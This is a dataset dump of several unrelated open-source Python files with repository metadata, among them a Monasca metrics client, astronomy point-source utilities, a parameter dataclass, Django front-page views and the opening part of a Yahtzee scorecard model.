        heap.insert(node3)
        node1 = Node(5)
        node2 = Node(6)
        node3 = Node(2)
        heap.insert(node1)
        heap.insert(node2)
        heap.insert(node3)
        pops = []
        while True:
            currentNode = heap.take_top()
            if currentNode is None:
                break
            pops.append(currentNode)
        self.assertEqual([0, 1, 2, 3, 5, 6], pops)
| 1,694 | 8 | 184 |
b2ec114ffc1ddfec726f8b3d6728e9cf8be1776a | 2,122 | py | Python | monascaclient/v2_0/metrics.py | openstack/python-monascaclient | 7c9a22bd0d408f4cd068863224ef434d7b17086d | [
"Apache-2.0"
] | 20 | 2015-10-18T02:56:28.000Z | 2020-11-23T20:27:22.000Z | monascaclient/v2_0/metrics.py | openstack/python-monascaclient | 7c9a22bd0d408f4cd068863224ef434d7b17086d | [
"Apache-2.0"
] | 1 | 2016-03-09T16:46:09.000Z | 2016-03-09T16:46:09.000Z | monascaclient/v2_0/metrics.py | openstack/python-monascaclient | 7c9a22bd0d408f4cd068863224ef434d7b17086d | [
"Apache-2.0"
] | 17 | 2015-11-16T09:48:26.000Z | 2018-06-23T06:44:44.000Z | # (C) Copyright 2014-2016 Hewlett Packard Enterprise Development LP
# Copyright 2017 FUJITSU LIMITED
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from monascaclient.common import monasca_manager
| 37.22807 | 79 | 0.671536 | # (C) Copyright 2014-2016 Hewlett Packard Enterprise Development LP
# Copyright 2017 FUJITSU LIMITED
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from monascaclient.common import monasca_manager
class MetricsManager(monasca_manager.MonascaManager):
    """Manager for the Monasca ``/metrics`` REST resource."""

    base_url = '/metrics'

    def create(self, **kwargs):
        """Create a metric; an optional ``tenant_id`` goes into the query string."""
        target_url = self.base_url
        if 'tenant_id' in kwargs:
            target_url = '%s?tenant_id=%s' % (target_url, kwargs.pop('tenant_id'))
        # a pre-built JSON body wins over the raw keyword arguments
        if 'jsonbody' in kwargs:
            payload = kwargs['jsonbody']
        else:
            payload = kwargs
        return self.client.create(url=target_url, json=payload)

    def list(self, **kwargs):
        """Get a list of metrics."""
        return self._list('', 'dimensions', **kwargs)

    def list_names(self, **kwargs):
        """Get a list of metric names."""
        return self._list('/names', 'dimensions', **kwargs)

    def list_measurements(self, **kwargs):
        """Get measurements matching the metric definition filters."""
        return self._list('/measurements', 'dimensions', **kwargs)

    def list_statistics(self, **kwargs):
        """Get measurement statistics matching the metric definition filters."""
        return self._list('/statistics', 'dimensions', **kwargs)

    def list_dimension_names(self, **kwargs):
        """Get a list of metric dimension names."""
        return self._list('/dimensions/names', **kwargs)

    def list_dimension_values(self, **kwargs):
        """Get a list of metric dimension values."""
        return self._list('/dimensions/names/values', **kwargs)
| 0 | 1,400 | 23 |
e80b20a433bfec00b8fa603256cdf13fbb80109b | 7,057 | py | Python | egf2ps/utils/utils.py | myinxd/egf2ps | d8db6059601a75260231c7e4b92f1e3c991f8a89 | [
"MIT"
] | 1 | 2016-10-20T08:58:01.000Z | 2016-10-20T08:58:01.000Z | egf2ps/utils/utils.py | myinxd/egf2ps | d8db6059601a75260231c7e4b92f1e3c991f8a89 | [
"MIT"
] | null | null | null | egf2ps/utils/utils.py | myinxd/egf2ps | d8db6059601a75260231c7e4b92f1e3c991f8a89 | [
"MIT"
] | null | null | null | # Copyright (c) Zhixian MA <zxma_sjtu@qq.com>
# MIT license
"""
Some I/O and processing tools are provied in this utils module.
Methods
-------
reg2mat:
Read point sources list from the region file, and translate it into np.ndarray
mat2reg:
Print PS list matrix to ds9 region files
compare:
Compare detected PS with the references
img2mat:
Read image from the provided path
logManager:
Configure logging style <to be strengthed>
References
------------
[1] scipy.ndimage
http://docs.scipy.org/doc/scipy/reference/generated/scipy.ndimage.
imread.html#scipy.ndimage.imread
"""
import os
import sys
import logging
import numpy as np
import pyregion
from astropy.io import fits
from scipy.ndimage import imread
# Defination of functions
def reg2mat(filename):
  """
  Read a ds9 region file and convert it into a matrix (uses pyregion).
  Returns 0 when the file does not exist; otherwise an np.ndarray whose
  rows are the coord_list of each region entry, in file order.
  """
  # bail out early when there is nothing to read
  # (the sentinel is the integer 0, matching existing callers)
  if not os.path.exists(filename):
    return 0
  region_list = pyregion.open(filename)
  # one row per region
  coords = [region.coord_list for region in region_list]
  return np.array(coords)
def mat2reg(ps, outfile, pstype='elp'):
  """
  Transform a point-source matrix into a ds9 region file.
  Parameters
  ----------
  ps: np.ndarray
    A two dimensional matrix holding the point sources, one row each.
    Columns used: (x, y, major, minor, angle) for 'elp', (x, y, radius)
    for 'cir', and (x, y, width, height) for anything else (box format).
  outfile: str
    Name of the output file.
  pstype: str
    Type of region, can be 'elp','cir','box'; any value other than
    'elp'/'cir' falls through to the box format.
  """
  # Fixes: the original compared strings with `is` (an identity check that
  # only works by CPython literal interning) and never closed the file.
  with open(outfile, 'w+') as reg:
    if pstype == 'elp':
      for i in range(ps.shape[0]):
        ps_str = 'ellipse(' + str(ps[i,0])+','+ str(ps[i,1])+\
            ','+str(ps[i,2])+','+str(ps[i,3])+','+str(ps[i,4])+')\n'
        reg.write(ps_str)
    elif pstype == 'cir':
      for i in range(ps.shape[0]):
        ps_str = 'circle(' + str(ps[i,0])+','+ str(ps[i,1])+','+str(ps[i,2])+')\n'
        reg.write(ps_str)
    else:
      for i in range(ps.shape[0]):
        ps_str = 'box(' + str(ps[i,0])+','+ str(ps[i,1])+','+str(ps[i,2])+','+str(ps[i,3])+',0)\n'
        reg.write(ps_str)
def compare(ps,ps_ref):
  """
  Compare detected ps with the real one or reference
  Parameters
  ----------
  ps: np.ndarray
    Detected point source list (columns 0 and 1 are x and y)
  ps_ref: np.ndarray
    Referenced point source list (columns 0 and 1 are x and y)
  Returns
  -------
  num_same: int
    Number of same PS
  err_rate: float
    Error rate
  cord_x,cord_y: list
    Coordinates of the same PS
  """
  # Init
  num_same = 0
  err_rate = 0.0
  cord_x = []
  cord_y = []
  # Extract coordinates of ps and ps_ref
  ps_x = ps[:,0].tolist()
  ps_y = ps[:,1].tolist()
  ps_ref_x = ps_ref[:,0].tolist()
  ps_ref_y = ps_ref[:,1].tolist()
  # Compare
  # NOTE(review): both loops start at index 1, so the first detection and
  # the first reference entry are never compared -- confirm this is intended.
  i = 1
  while i <= len(ps_ref_x) - 1:
    j = 1
    # NOTE(review): the inner bound uses len(ps_ref_x) but indexes ps_x;
    # if ps is shorter than ps_ref this raises IndexError, and removals
    # from ps_x shrink the list while the bound stays fixed -- verify.
    while j <= len(ps_ref_x) - 1:
      # Euclidean distance between detection j and reference i;
      # a match is declared within 5 units
      d = np.sqrt((ps_x[j]-ps_ref_x[i])**2 + (ps_y[j]-ps_ref_y[i])**2)
      if d <= 5:
        num_same += 1
        cord_x.append(ps_x[j])
        cord_y.append(ps_y[j])
        # drop the matched detection so it cannot match twice
        # (list.remove deletes the first equal value, not necessarily index j)
        ps_x.remove(ps_x[j])
        ps_y.remove(ps_y[j])
        break
      j += 1
    i += 1
  len_ps = ps.shape[0]
  # error = count mismatch plus missed references, relative to reference size
  err_rate = (abs(len_ps - len(ps_ref_x)) + len(ps_ref_x) - num_same)/ len(ps_ref_x)
  return num_same,err_rate,cord_x,cord_y
def img2mat(imgpath):
  """
  Load image
  Parameter
  ---------
  imgpath: str
    path of the image; the image can be a FITS file or a regular image file
  Returns
  -------
  img_mat: np.ndarray
    image data; non-FITS images are read as greyscale and scaled to [0, 1]
  """
  # Judge type of path by its file extension
  postfix = os.path.splitext(imgpath)[-1]
  if postfix == '.fits':
    try:
      img = fits.open(imgpath)
    except IOError:
      # NOTE(review): sys.exit() kills the whole process on a bad path;
      # raising an exception would let callers recover -- confirm intent.
      sys.exit("The image can't be loaded.")
    # image data of the primary HDU
    img_mat = img[0].data
  else:
    try:
      # mode='L': read as 8-bit greyscale
      # NOTE(review): scipy.ndimage.imread was removed in newer SciPy
      # releases -- confirm the pinned SciPy version still provides it.
      img_mat = imread(imgpath,mode='L')
    except IOError:
      sys.exit("The image can't be loaded.")
    # normalise the 8-bit greyscale values to floats in [0, 1]
    img_mat = np.array(img_mat,dtype=float)/255
  return img_mat
def cluster(pslist,dist=5,itertime=3):
  """Cluster of potential point sources
  Parameter
  ---------
  pslist: np.ndarray
    Candidate point sources, one row per source with columns
    (col, row, col_axis, row_axis, angle, peak)
  dist: int
    Smallest distance between two point sources to be clustered
  itertime: int
    Number of clustering passes to run
  Returns
  -------
  final_list: np.ndarray
    Clustered sources, columns (col, row, col_axis, row_axis, angle, peak)
  """
  # Init: unpack each column into plain Python lists so entries can be
  # removed in place as clusters are merged
  rowIdx = pslist[:,1].tolist()
  colIdx = pslist[:,0].tolist()
  rowAxis = pslist[:,3].tolist()
  colAxis = pslist[:,2].tolist()
  ang = pslist[:,4].tolist()
  peaks = pslist[:,5].tolist()
  # Clustering: each pass absorbs every later source within `dist` of
  # source i into source i, then replaces i by the cluster average
  for t in range(itertime):
    i = 0
    while i <= len(colIdx) - 1:
      j = i + 1
      xs = colIdx[i]
      ys = rowIdx[i]
      temp_x = [xs]
      temp_y = [ys]
      temp_peak = [peaks[i]]
      temp_ra = [rowAxis[i]]
      temp_ca = [colAxis[i]]
      temp_ang = [ang[i]]
      while j <= len(colIdx) - 1:
        if np.sqrt((xs-colIdx[j])**2+(ys-rowIdx[j])**2)<=dist:
          temp_x.append(colIdx[j])
          temp_y.append(rowIdx[j])
          temp_ra.append(rowAxis[j])
          temp_ca.append(colAxis[j])
          temp_peak.append(peaks[j])
          temp_ang.append(ang[j])
          # remove the absorbed source from every parallel list
          # NOTE(review): list.remove deletes the first equal value, which
          # equals index j only when values are unique -- confirm that
          # duplicate coordinates/values cannot occur here.
          rowIdx.remove(rowIdx[j])
          colIdx.remove(colIdx[j])
          rowAxis.remove(rowAxis[j])
          colAxis.remove(colAxis[j])
          peaks.remove(peaks[j])
          ang.remove(ang[j])
          # change j: step back so the element shifted into slot j is
          # examined on the next iteration
          j = j - 1
        j = j + 1
      # update source i with the cluster averages; the angle is taken
      # from the cluster member with the strongest peak
      rowIdx[i] = round(np.mean(temp_y))
      colIdx[i] = round(np.mean(temp_x))
      rowAxis[i] = np.mean(temp_ra)
      colAxis[i] = np.mean(temp_ca)
      peaks[i] = np.max(temp_peak)
      # works because peaks[i] is a numpy scalar: `==` broadcasts over the
      # temp_peak list and np.where returns the matching indices
      idx = np.where(temp_peak==peaks[i])[0][0]
      ang[i] = temp_ang[idx]
      i = i + 1
  final_list = np.array([colIdx,rowIdx,colAxis,rowAxis,ang,peaks]).transpose()
  return final_list
def logManager(loglevel="INFO",toolname="egf2ps",appname = ""):
  """
  A simple logging manager to configure the logging style.
  Parameters
  ----------
  loglevel: str
    Level of logging, which can be "DEBUG","INFO","WARNING","ERROR",
    and "CRITICAL". Default as "INFO".
  toolname: str
    Name of the tool, embedded into every formatted log record.
  appname: str
    Name of the method or class; used as the logger name.
  Returns
  -------
  logger: logging.Logger
    The configured logger instance.
  Reference
  ---------
  [1] Reitz, K., and Schlusser, T.
    "The Hitchhiker's Guide to Python",
    O'Reilly, 2016.
  """
  # Formatter: "[LEVEL timestamp]<toolname>--<logger name>: message"
  formatter = logging.Formatter(
    '[%(levelname)s %(asctime)s]'+ toolname +
    '--%(name)s: %(message)s')
  # Set handler
  handler = logging.StreamHandler()
  handler.setFormatter(formatter)
  # Initialize logger
  # NOTE(review): repeated calls with the same appname attach duplicate
  # handlers; guard with `if not logger.handlers:` if that is unwanted.
  logger = logging.getLogger(appname)
  logger.addHandler(handler)
  # Fix: resolve the level name with getattr instead of eval() -- same
  # result for the documented level names, without executing an arbitrary
  # caller-supplied string.
  logger.setLevel(getattr(logging, loglevel))
  return logger
| 27.038314 | 102 | 0.536063 | # Copyright (c) Zhixian MA <zxma_sjtu@qq.com>
# MIT license
"""
Some I/O and processing tools are provied in this utils module.
Methods
-------
reg2mat:
Read point sources list from the region file, and translate it into np.ndarray
mat2reg:
Print PS list matrix to ds9 region files
compare:
Compare detected PS with the references
img2mat:
Read image from the provided path
logManager:
Configure logging style <to be strengthed>
References
------------
[1] scipy.ndimage
http://docs.scipy.org/doc/scipy/reference/generated/scipy.ndimage.
imread.html#scipy.ndimage.imread
"""
import os
import sys
import logging
import numpy as np
import pyregion
from astropy.io import fits
from scipy.ndimage import imread
# Defination of functions
def reg2mat(filename):
"""
Read region files and transform to matrix,the pyregion module is used.
"""
# Init
if os.path.exists(filename):
pslist = pyregion.open(filename)
else:
return 0
# Split and get the numbers
num_ps = len(pslist)
ps = []
for i in range(num_ps):
ps.append(pslist[i].coord_list)
ps = np.array(ps)
return ps
def mat2reg(ps,outfile,pstype = 'elp'):
"""
Transform ps mat to region file
Parameters
----------
ps: np.ndarray
A two dimensional matrix holds the information of point sources
outfile: str
Name of the output file
pstype: str
Type of region, can be 'elp','cir','box'
"""
reg = open(outfile,'w+')
if pstype is 'elp':
for i in range(ps.shape[0]):
ps_str = 'ellipse(' + str(ps[i,0])+','+ str(ps[i,1])+\
','+str(ps[i,2])+','+str(ps[i,3])+','+str(ps[i,4])+')\n'
reg.write(ps_str)
elif pstype is 'cir':
for i in range(ps.shape[0]):
ps_str = 'circle(' + str(ps[i,0])+','+ str(ps[i,1])+','+str(ps[i,2])+')\n'
reg.write(ps_str)
else:
for i in range(ps.shape[0]):
ps_str = 'box(' + str(ps[i,0])+','+ str(ps[i,1])+','+str(ps[i,2])+','+str(ps[i,3])+',0)\n'
reg.write(ps_str)
def compare(ps,ps_ref):
"""
Compare detected ps with the real one or reference
Parameters
----------
ps: np.ndarray
Detected point source list
ps_ref: np.ndarray
Referenced point source list
Returns
-------
num_same: int
Number of same PS
cord_x,cord_y: list
Coordinates of the same PS
err_rate: float
Error rate
"""
# Init
num_same = 0
err_rate = 0.0
cord_x = []
cord_y = []
# Extract coordinates of ps and ps_ref
ps_x = ps[:,0].tolist()
ps_y = ps[:,1].tolist()
ps_ref_x = ps_ref[:,0].tolist()
ps_ref_y = ps_ref[:,1].tolist()
# Compare
i = 1
while i <= len(ps_ref_x) - 1:
j = 1
while j <= len(ps_ref_x) - 1:
d = np.sqrt((ps_x[j]-ps_ref_x[i])**2 + (ps_y[j]-ps_ref_y[i])**2)
if d <= 5:
num_same += 1
cord_x.append(ps_x[j])
cord_y.append(ps_y[j])
ps_x.remove(ps_x[j])
ps_y.remove(ps_y[j])
break
j += 1
i += 1
len_ps = ps.shape[0]
err_rate = (abs(len_ps - len(ps_ref_x)) + len(ps_ref_x) - num_same)/ len(ps_ref_x)
return num_same,err_rate,cord_x,cord_y
def img2mat(imgpath):
"""
Load image
Parameter
---------
imgpath: str
path of the image,the image can be fits or other image type files
"""
# Judge type of path
postfix = os.path.splitext(imgpath)[-1]
if postfix == '.fits':
try:
img = fits.open(imgpath)
except IOError:
sys.exit("The image can't be loaded.")
img_mat = img[0].data
else:
try:
img_mat = imread(imgpath,mode='L')
except IOError:
sys.exit("The image can't be loaded.")
img_mat = np.array(img_mat,dtype=float)/255
return img_mat
def cluster(pslist,dist=5,itertime=3):
"""Cluster of potential point sources
Parameter
---------
dist: int
Smallest distance between to point sources to be clustered
itertime: int
Time of iteration
"""
# Init
rowIdx = pslist[:,1].tolist()
colIdx = pslist[:,0].tolist()
rowAxis = pslist[:,3].tolist()
colAxis = pslist[:,2].tolist()
ang = pslist[:,4].tolist()
peaks = pslist[:,5].tolist()
# Clustering
for t in range(itertime):
i = 0
while i <= len(colIdx) - 1:
j = i + 1
xs = colIdx[i]
ys = rowIdx[i]
temp_x = [xs]
temp_y = [ys]
temp_peak = [peaks[i]]
temp_ra = [rowAxis[i]]
temp_ca = [colAxis[i]]
temp_ang = [ang[i]]
while j <= len(colIdx) - 1:
if np.sqrt((xs-colIdx[j])**2+(ys-rowIdx[j])**2)<=dist:
temp_x.append(colIdx[j])
temp_y.append(rowIdx[j])
temp_ra.append(rowAxis[j])
temp_ca.append(colAxis[j])
temp_peak.append(peaks[j])
temp_ang.append(ang[j])
# remove
rowIdx.remove(rowIdx[j])
colIdx.remove(colIdx[j])
rowAxis.remove(rowAxis[j])
colAxis.remove(colAxis[j])
peaks.remove(peaks[j])
ang.remove(ang[j])
# change j
j = j - 1
j = j + 1
# update
rowIdx[i] = round(np.mean(temp_y))
colIdx[i] = round(np.mean(temp_x))
rowAxis[i] = np.mean(temp_ra)
colAxis[i] = np.mean(temp_ca)
peaks[i] = np.max(temp_peak)
idx = np.where(temp_peak==peaks[i])[0][0]
ang[i] = temp_ang[idx]
i = i + 1
final_list = np.array([colIdx,rowIdx,colAxis,rowAxis,ang,peaks]).transpose()
return final_list
def logManager(loglevel="INFO",toolname="egf2ps",appname = ""):
"""
A simple logging manger to configure the logging style.
Parameters
----------
loglevel: str
Level of logging, which can be "DEBUG","INFO","WARNING","ERROR",
and "CRITICAL". Default as "INFO".
toolname: str
Name of the tool.
appname: str
Name of the method or class.
Reference
---------
[1] Reitz, K., and Schlusser, T.
"The Hitchhiker's Guide to Python",
O'Reilly, 2016.
"""
# Formatter<TODO>
formatter = logging.Formatter(
'[%(levelname)s %(asctime)s]'+ toolname +
'--%(name)s: %(message)s')
# Set handler
handler = logging.StreamHandler()
handler.setFormatter(formatter)
# Initialize logger
logger = logging.getLogger(appname)
logger.addHandler(handler)
# Set level
level = "logging." + loglevel
logger.setLevel(eval(level))
return logger
| 0 | 0 | 0 |
91dcad4059e64ff29435b4bbb419c370b8bd3393 | 196 | py | Python | spatial_utils/_version.py | kevinyamauchi/spatial-utils | 239aed21e4c45375baf328a5d9c9e6401b94f386 | [
"BSD-3-Clause"
] | 1 | 2021-09-07T09:58:18.000Z | 2021-09-07T09:58:18.000Z | spatial_utils/_version.py | kevinyamauchi/squidpy-utils | 239aed21e4c45375baf328a5d9c9e6401b94f386 | [
"BSD-3-Clause"
] | null | null | null | spatial_utils/_version.py | kevinyamauchi/squidpy-utils | 239aed21e4c45375baf328a5d9c9e6401b94f386 | [
"BSD-3-Clause"
] | null | null | null | # coding: utf-8
# file generated by setuptools_scm
# don't change, don't track in version control
version = '0.0.2.dev0+g3ce8781.d20210430'
version_tuple = (0, 0, 2, 'dev0+g3ce8781', 'd20210430')
| 32.666667 | 55 | 0.72449 | # coding: utf-8
# file generated by setuptools_scm
# don't change, don't track in version control
version = '0.0.2.dev0+g3ce8781.d20210430'
version_tuple = (0, 0, 2, 'dev0+g3ce8781', 'd20210430')
| 0 | 0 | 0 |
dc19d0f362b886c19cd7240d4df95b51182b6cdb | 3,736 | py | Python | midynet/config/parameter.py | charlesmurphy1/fast-midynet | 22071d49077fce9d5f99a4664f36767b27edea64 | [
"MIT"
] | null | null | null | midynet/config/parameter.py | charlesmurphy1/fast-midynet | 22071d49077fce9d5f99a4664f36767b27edea64 | [
"MIT"
] | null | null | null | midynet/config/parameter.py | charlesmurphy1/fast-midynet | 22071d49077fce9d5f99a4664f36767b27edea64 | [
"MIT"
] | null | null | null | import pathlib
import typing
from typing import Any, Iterable, List, Optional, Set, Union, Type
from dataclasses import dataclass, field
__all__ = ("Parameter",)
@dataclass(order=True)
if __name__ == "__main__":
pass
| 30.876033 | 79 | 0.589936 | import pathlib
import typing
from typing import Any, Iterable, List, Optional, Set, Union, Type
from dataclasses import dataclass, field
__all__ = ("Parameter",)
@dataclass(order=True)
class Parameter:
name: str
value: Any = None
unique: bool = field(repr=True, default=False)
with_repetition: bool = field(repr=True, default=False)
force_non_sequence: bool = field(repr=True, default=False)
sort_sequence: bool = field(repr=True, default=True)
is_config: bool = False
__cache__: bool = field(repr=False, default=True)
__self_hash__: Optional[int] = field(repr=False, default=None)
@property
def datatype(self) -> Any:
return self.infer_type(self.value)
def get_sequence(self, values: Any) -> Union[List[Any], Set[Any]]:
if not issubclass(type(values), typing.Iterable) or isinstance(
values, str
):
seq = [values]
else:
seq = values.copy()
if not self.with_repetition and not self.is_config:
seq = list(set(seq))
if self.sort_sequence:
seq.sort()
return seq
def __getitem__(self, key: str) -> Any:
if not self.is_sequenced():
message = "this parameter is not sequenced."
raise LookupError(message)
return self.value[key]
def __hash__(self) -> int:
if self.__self_hash__ is None:
if isinstance(self.value, list):
h = hash(tuple(self.value))
else:
h = hash(self.value)
if self.__cache__:
self.__self_hash__ = h
else:
return h
return self.__self_hash__
def __reset_buffer__(self) -> None:
self.__self_hash__ = None
def set_value(self, value: Any) -> None:
value = value.value if issubclass(type(value), Parameter) else value
if issubclass(type(value), typing.Iterable) and not isinstance(
value, str
):
value = self.get_sequence(value)
self.value = value
self.__reset_buffer__()
def add_value(self, value: Any) -> None:
if issubclass(type(self.value), typing.Iterable):
self.value = self.get_sequence(list(self.value) + [value])
else:
self.value = self.get_sequence([self.value, value])
if len(self.value) == 1:
self.value = next(iter(self.value))
self.__reset_buffer__()
def add_values(self, values: Iterable[Any]) -> None:
seq = self.get_sequence(values)
for v in seq:
self.add_value(v)
self.__reset_buffer__()
def is_sequenced(self) -> bool:
return (
issubclass(type(self.value), typing.Iterable)
and not isinstance(self.value, str)
and not self.force_non_sequence
)
def is_unique(self) -> bool:
return self.unique
def infer_type(self, value: Any) -> Type:
if self.force_non_sequence or isinstance(value, str):
return type(value)
if isinstance(value, dict):
message = "invalid value type `dict`."
raise TypeError(message)
if issubclass(type(value), typing.Iterable):
return self.infer_type(next(iter(value)))
return type(value)
def generate_sequence(self) -> Any:
if self.is_sequenced():
for v in self.value:
yield v
else:
yield self.value
def format(self) -> str:
if isinstance(self.value, str) or isinstance(self.value, pathlib.Path):
return f"`{self.value}`"
else:
return f"{self.value}"
if __name__ == "__main__":
pass
| 2,711 | 776 | 22 |
6a8f8e112fc7ec8ceebd35cc7eb5921c068908d3 | 1,343 | py | Python | kirppu/frontpage.py | kcsry/kirppu | 91910867d5eff3b2cee2bf9e934db16e1f96ae14 | [
"MIT"
] | null | null | null | kirppu/frontpage.py | kcsry/kirppu | 91910867d5eff3b2cee2bf9e934db16e1f96ae14 | [
"MIT"
] | 1 | 2018-01-18T10:30:43.000Z | 2018-01-18T10:33:18.000Z | kirppu/frontpage.py | kcsry/kirppu | 91910867d5eff3b2cee2bf9e934db16e1f96ae14 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
from datetime import date, timedelta
from django.shortcuts import render
__author__ = 'codez'
from .models import Event
| 23.561404 | 71 | 0.614296 | # -*- coding: utf-8 -*-
from datetime import date, timedelta
from django.shortcuts import render
__author__ = 'codez'
from .models import Event
def _events():
    """Split visible, recent events into (coming, old) lists.

    Events that ended more than ~half a year ago are filtered out at the
    database level.  Of the remainder, anything that ended within the last
    week still counts as "coming"; currently ongoing events are flagged
    with the ad-hoc attribute ``fp_currently_ongoing``.
    """
    today = date.today()
    # 26 weeks ~= half year
    visible_since = today - timedelta(weeks=26)
    # keep just-ended events in the "coming" list for a week
    recent_since = today - timedelta(days=7)
    queryset = Event.objects.filter(
        end_date__gte=visible_since,
        visibility=Event.VISIBILITY_VISIBLE,
    ).order_by("-start_date")
    coming_events, old_events = [], []
    for event in queryset:
        if event.end_date < recent_since:
            old_events.append(event)
            continue
        if event.start_date <= today <= event.end_date:
            event.fp_currently_ongoing = True
        coming_events.append(event)
    return coming_events, old_events
def front_page(request):
    """Render the front page listing coming and old events separately."""
    coming_events, old_events = _events()
    return render(
        request,
        "kirppu/frontpage.html",
        {
            "events": coming_events,
            "old_events": old_events,
        },
    )
def front_for_mobile_view(request):
    """Render the mobile-view front page; only coming events are shown."""
    events, _ = _events()
    return render(
        request,
        "kirppu/frontpage_for_mobile_view.html",
        {
            "events": events,
        },
    )
| 1,124 | 0 | 69 |
591cf7175d695572a54719a70ee4c59ace4601e3 | 553 | py | Python | Code/preprocess_corpus.py | justjoshtings/Final-Project-Group4 | 71af8885817a524d3e1201712583e29df77bb630 | [
"MIT"
] | null | null | null | Code/preprocess_corpus.py | justjoshtings/Final-Project-Group4 | 71af8885817a524d3e1201712583e29df77bb630 | [
"MIT"
] | null | null | null | Code/preprocess_corpus.py | justjoshtings/Final-Project-Group4 | 71af8885817a524d3e1201712583e29df77bb630 | [
"MIT"
] | null | null | null | """
preprocess_corpus.py
Script to preprocess corpus data
author: @justjoshtings
created: 3/31/2022
"""
from Woby_Modules.CorpusProcessor import CorpusProcessor
if __name__ == "__main__":
print("Executing preprocess_corpus.py")
main()
| 21.269231 | 68 | 0.717902 | """
preprocess_corpus.py
Script to preprocess corpus data
author: @justjoshtings
created: 3/31/2022
"""
from Woby_Modules.CorpusProcessor import CorpusProcessor
def main():
    """Drive the corpus preprocessing pipeline end to end."""
    scrapper_log = '../Woby_Log/ScrapperLog.log'
    corpus_filepath = '../corpus_data/'
    processor = CorpusProcessor(corpus_filepath, log_file=scrapper_log)
    print('Corpus size: ', processor.corpus_size()/1e6, 'MB')
    # clean, explore, then split the corpus into sentences
    processor.clean_corpus()
    processor.EDA()
    processor.split_by_sentence()
if __name__ == "__main__":
print("Executing preprocess_corpus.py")
main()
| 284 | 0 | 23 |
f1a78ba48b4488e2e7ed9d6db9447a1689a17b95 | 29,357 | py | Python | yahtzee/model.py | sdenholm/yahtzee | 0a3c6695bfd282162ee701147b16bc928d4b1e12 | [
"MIT"
] | null | null | null | yahtzee/model.py | sdenholm/yahtzee | 0a3c6695bfd282162ee701147b16bc928d4b1e12 | [
"MIT"
] | null | null | null | yahtzee/model.py | sdenholm/yahtzee | 0a3c6695bfd282162ee701147b16bc928d4b1e12 | [
"MIT"
] | null | null | null | import logging
logger = logging.getLogger(__name__)
import itertools
import random
from collections import OrderedDict
import functools
import numpy as np
import pandas as pd
from enum import Enum
| 33.28458 | 113 | 0.653609 | import logging
logger = logging.getLogger(__name__)
import itertools
import random
from collections import OrderedDict
import functools
import numpy as np
import pandas as pd
from enum import Enum
class Scorecard:
  # plural word for each supported die face value; MAX_DICE_FACES below is
  # capped by how many entries exist here
  numberWords = {
    1: "ones", 2: "twos", 3: "threes", 4: "fours", 5: "fives",
    6: "sixes", 7: "sevens", 8: "eights", 9: "nines", 10: "tens",
    11: "elevens", 12: "twelves", 13: "thirteens", 14: "fourteens", 15: "fifteens",
    16: "sixteens", 17: "seventeens", 18: "eighteens", 19: "nineteens", 20: "twenties"
  }
  # supported range of die face counts
  MIN_DICE_FACES = 6
  MAX_DICE_FACES = len(numberWords)
  # display names of the fixed (non-numbered) scorecard rows
  class ROW_NAME(Enum):
    UPPER_TOTAL = "Upper Total"
    UPPER_BONUS = "Upper Bonus"
    THREE_OF_A_KIND = "Three of a Kind"
    FOUR_OF_A_KIND = "Four of a Kind"
    FULL_HOUSE = "Full House"
    SMALL_STRAIGHT = "Small Straight"
    LARGE_STRAIGHT = "Large Straight"
    CHANCE = "Chance"
    YAHTZEE = "Yahtzee"
    YAHTZEE_BONUS = "Yahtzee Bonus"
    LOWER_TOTAL = "Lower Total"
  # fixed point awards for the corresponding sections
  class POINTS(Enum):
    UPPER_BONUS = 35
    FULL_HOUSE = 25
    SMALL_STRAIGHT = 30
    LARGE_STRAIGHT = 40
    YAHTZEE = 50
    YAHTZEE_BONUS = 100
class PointsCalculator:
"""
# Class for determining the points for each section of scorecard, based on
# the current values of the dice
"""
    @staticmethod
    def _hasStraight(uniqueSortedDice, length):
      """
      # Is there a straight (consecutive run) of <length> dice within the
      # list of unique, sorted dice values?
      #
      # uniqueSortedDice: (list) unique dice values in ascending order
      # length:           (int)  required run length
      """
      # if we don't have enough dice for a straight
      if len(uniqueSortedDice) < length:
        return False
      # check if we can find a sequence in the list of unique, sorted dice
      for comb in itertools.combinations(uniqueSortedDice, length):
        if comb == tuple(range(comb[0], comb[0] + length)):
          return True
      # no dice
      return False
    @staticmethod
    def _hasFullHouse(diceCounts):
      """
      # Do we have a full house, i.e., only two unique dice values, with
      # at least 2 of everything
      # diceCounts: (pd.Series) per-face counts, as built by value_counts()
      """
      return len(diceCounts.index) == 2 and (diceCounts > 1).all()
    @staticmethod
    def _hasYahtzee(diceCounts):
      """ Do we have a Yahtzee, i.e., all dice values are the same """
      return len(diceCounts) == 1
    @staticmethod
    def _calcOfAKindScore(num, kind, diceValues):
      """
      # Calculate score of X-of-a-kind, e.g., 3-of-a-kind
      #
      # num:        (int) how many of-a-kind
      # kind:       (int) dice value to look for <num> of
      # diceValues: (list) actual dice values to process
      #
      """
      valCounts = pd.Series(diceValues).value_counts()
      # if we don't have enough "kind"s, then score is 0
      #  -e.g., not enough 4s
      if valCounts.get(kind, 0) < num:
        return 0
      # if we have enough "kind"s, then score is sum of all dice
      return sum(diceValues)
    @staticmethod
    def _calcSingleDiceScore(kind, diceValues):
      """
      # Calculate score of a single dice value, e.g., upper section score for 3s
      #
      # kind:       (int) dice value to look at
      # diceValues: (list) actual dice values to process
      #
      """
      valCounts = pd.Series(diceValues).value_counts()
      # add together all the "kind" of dice we see
      return valCounts.get(kind, 0) * kind
    def _calcUpperSection(self, diceValue):
      """ score based on how many die of <diceValue> we have
      (count of that face times the face value itself) """
      return self.diceCounts.get(diceValue, 0) * diceValue
def _calc3ofAKind(self):
# 3-of-a-kind score is max of all available three-of-a-kinds
# -note: in normal, 5-dice game, this is overkill
threeOfAKindScore = 0
